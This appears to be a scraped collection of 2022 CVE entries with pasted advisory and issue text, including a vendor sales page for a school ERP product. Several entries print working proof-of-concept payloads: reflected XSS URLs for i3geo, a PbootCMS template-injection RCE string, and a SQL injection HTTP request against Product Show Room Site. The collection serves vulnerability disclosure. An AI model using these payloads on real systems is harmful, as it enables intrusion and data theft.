Honeywell Alerton Ascent Control Module (ACM) through 2022-05-04 allows unauthenticated programming writes from remote users. This enables code to be store on the controller and then run without verification. A user with malicious intent can send a crafted packet to change and/or stop the program without the knowledge of other users, altering the controller's function. After the programming change, the program needs to be overwritten in order for the controller to restore its original operational function.

CVE-2022-30244: Product Security

Arox School ERP Pro v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the dispatchcategory parameter in backoffice.inc.php.

**About School ERP**

School ERP is a web based school management system that enables school to use and operate many of integrated interrelated modules and manages the administration of school efficiently. Due to its ever growing and competitive nature, the education sector has always been in need of a quality solution to manage and serve the school resources efficiently. It sector is giving number of solutions to schools like smart classroom, digital learning solutions and school management system to make learning easier and manage school administration effectively. Today educational institution is not limited to imparting education alone, but it is adapting latest trends in it for improving the quality of education and handling various activities of school including admissions, class management, library management, logistics, inventory, fee management, certificate, accounts etc. We offer School ERP which simplifies and automates schools administration process. The school management system is accurate and reliable and can be conveniently accessed from school internet as well as from the public internet. It is fully browser based school management system which also includes virtual campus which can be linked with school portal and contains powerful online access to bring parents, teachers and students on a common interactive platform. Yet another advantage of the ERP system is that it runs on minimal hardware and easily fits in the budget of schools. In ERP users have role based access rights which tightly models existing schools hierarchy. School ERP is totally customizable according to the needs of school.

**Features of School ERP:**

*   Fees Management
*   Attendance Management
*   Certificate/ Notice Creation and Printing
*   Examination & Results
*   Class & Time Table Management
*   Transportation Management
*   Financial Accounts Management

*   Purchase and Store Management
*   Accounting Management
*   Event Management
*   Front Office Management
*   Human Resource Management
*   Employee Management.(Leave, Tax, Pay Slip, Deduction)
*   Notification Management

*   Hostel Management
*   ID Card Printing
*   Security Management- Visitors. Record, Report
*   Notice Board
*   Library Management
*   Videos
*   Photo Gallery

**Projects**

**You'll get two projects(both pro and responsive versions) with Source Code****Technology: PHP/mySQL**

*   Check first two versions demo(Pro and Responsive version demo), You'll get both projects at a nominal cost here.

*   **Pricing:**
*   Indians: Rs.15499/- Rs.1999/-
*   Non-Indians: USD 249/- USD 39/-

*   **Buy Now:**
*   Indian Customers click here
*   Non-Indian Customers click here

**FAQs**

Will I get editable/non-encrypted source code on purchase of any of above product?

Yes, you'll get complete source code on purchase of any product. You can easily edit/customize it with help of a PHP Developer.

What technologies are used in School ERP Pro and School ERP Responsive?

PHP with mySQL database is used.

What is the difference between School ERP Pro, School ERP Responsive and Pro+Responsive Combo?

The basic difference between School ERP Pro and School ERP Responsive is their User Interface Design. School ERP Pro comes with table based design. And School ERP Responsive comes with latest Bootstrap based design which is device friendly layout.  
And Pro+Responsive Combo is not a third project. In this package you get two projects:- School ERP Pro and School ERP Responsive

If I want to upgrade Pro version to Responsive version, Should I pay remaining amount between School ERP Pro and School ERP Responsive?

No, You'll have to pay the amount between Pro+Responsive Combo and Your previously purchased product.

**© 2021. All rights reserved**

CVE-2022-32118: School Management System with Source Code

A vulnerability was found in URVE Web Manager. It has been rated as critical. This issue affects some unknown processing of the file _internal/uploader.php. The manipulation leads to unrestricted upload. The attack needs to be approached within the local network. The exploit has been disclosed to the public and may be used.

URVE Web Manager uploader.php has a file upload vulnerability, which can be exploited by attackers to gain system privileges.

    if(isset($_FILES['userfile']))
    {
    	$uploadfile = $uploaddir.'/'. $_FILES['userfile']['name'];//basename($_FILES['userfile']['name']);
    	//echo '<pre>';
    	//error_log(print_r($_FILES, true)."\n", 3, 'logs.txt');
    	if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    		//error_log(print_r($uploadfile, true)."\n", 3, 'logs.txt');
    		chmod($uploadfile, 0777);
    	   // echo "File is valid, and was successfully uploaded.\n";
    	} else {
    	   // echo "Possible file upload attack!\n";
    	}

CVE-2022-2420: webray.com.cn/URVE Web Manager uploader.php  File upload vulnerability.md at main · joinia/webray.com.cn

A vulnerability was found in URVE Web Manager. It has been declared as critical. This vulnerability affects unknown code of the file _internal/collector/upload.php. The manipulation leads to unrestricted upload. Access to the local network is required for this attack to succeed. The exploit has been disclosed to the public and may be used.

CVE-2022-2419

A vulnerability was found in URVE Web Manager. It has been classified as critical. This affects an unknown part of the file kreator.html5/img_upload.php. The manipulation leads to unrestricted upload. Access to the local network is required for this attack. The exploit has been disclosed to the public and may be used.

CVE-2022-2418

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.

Boa tarde

A vulnerabilidade em questão está no arquivo request\_token.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

http://.../i3geo/pacotes/linkedinoauth/example/request\_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--  
Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34094: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - request_token.php · Issue #5 · edmarmoretti/i3geo

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.

Boa tarde

A vulnerabilidade em questão está no arquivo access\_token.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

*   http://.../i3geo/pacotes/linkedinoauth/example/access\_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34093: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - access_token.php · Issue #4 · saladesituacao/i3geo

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via svg2img.php.

Boa tarde

A vulnerabilidade em questão está no arquivo svg2img.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

*   http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34092: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - svg2img.php · Issue #3 · saladesituacao/i3geo

PbootCMS v3.1.2 was discovered to contain a remote code execution (RCE) vulnerability via the function parserIfLabel at function.php.

poc：

?snakin=}{pboot:if((get\_lg/\*-\*/())/\*\*/(get\_backurl/\*-\*/()))}{/pboot:if}&backurl=;id

debug：

Finally we execute the malicious code in the parserIfLabel using eval

eval('if(' . $matches\[1\]\[$i\] . '){$flag="if";}else{$flag="else";}');

Call Stack

    ParserController.php:3310, app\home\controller\ParserController->parserIfLabel()
    ParserController.php:84, app\home\controller\ParserController->parserAfter()
    SearchController.php:42, app\home\controller\SearchController->index()
    IndexController.php:53, app\home\controller\IndexController->_empty()
    2:2, core\basic\Kernel::zilvriijuizzauc606dfdd68060e63ad8f7c7ddd49b8b8()
    2:2, core\basic\Kernel::run()
    start.php:17, require()
    index.php:23, {main}()
    

First bring in the payload, after rendering the template the system will load the malicious statement

So let's follow up with the initial rendering template section

Continue to see $content = ob_get_contents(); Here the url is output directly and then saved to $content.

Then there is no point in filtering for keywords after that

The problem actually lies in the QR code generation function parserQrcodeLabel

Here the content of the tag QR code is matched, and then it will generate the QR code link

If we want to exploit this, we need to make sure that our malicious code is not matched in this step, and here we need to do a bypass of the regular

    /\{pboot:qrcode(\s+[^}]+)?\}/
    

It is easy to see that we just need to make a closure using }

Next $content goes through a series of functions to the parserIfLabel function

We use get_lg and get_backurl functions with regular bypass to complete the RCE

Both functions are in function.php

get_lg is the field from which the cookie lg is taken

// 获取当前语言并进行安全处理Å
function get\_lg()
{
    $lg = cookie('lg');
    if (! $lg || ! preg\_match('/^\[\\w\\-\]+$/', $lg)) {
        $lg = get\_default\_lg();
        cookie('lg', $lg);
    }
    return $lg;
}

get_backurl is from get

// 获取返回URL
function get\_backurl()
{
    if (! ! $backurl = get('backurl')) {
        if (isset($\_SERVER\["QUERY\_STRING"\]) && ! ! get('p')) {
            return "&backurl=" . $backurl;
        } else {
            return "?backurl=" . $backurl;
        }
    } else {
        return;
    }
}

Since the vulnerability point does not exist in search, it can be called from any interface

CVE-2022-32417: PbootCMS v3.1.2 remote code execution · Issue #1 · Snakinya/Vuln

Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

Vul\_Author: XuBoyu

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/classes/Master.php?f=delete\_product

Vulnerability location: /psrs/classes/Master.php?f=delete\_product, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /psrs/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/psrs/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#php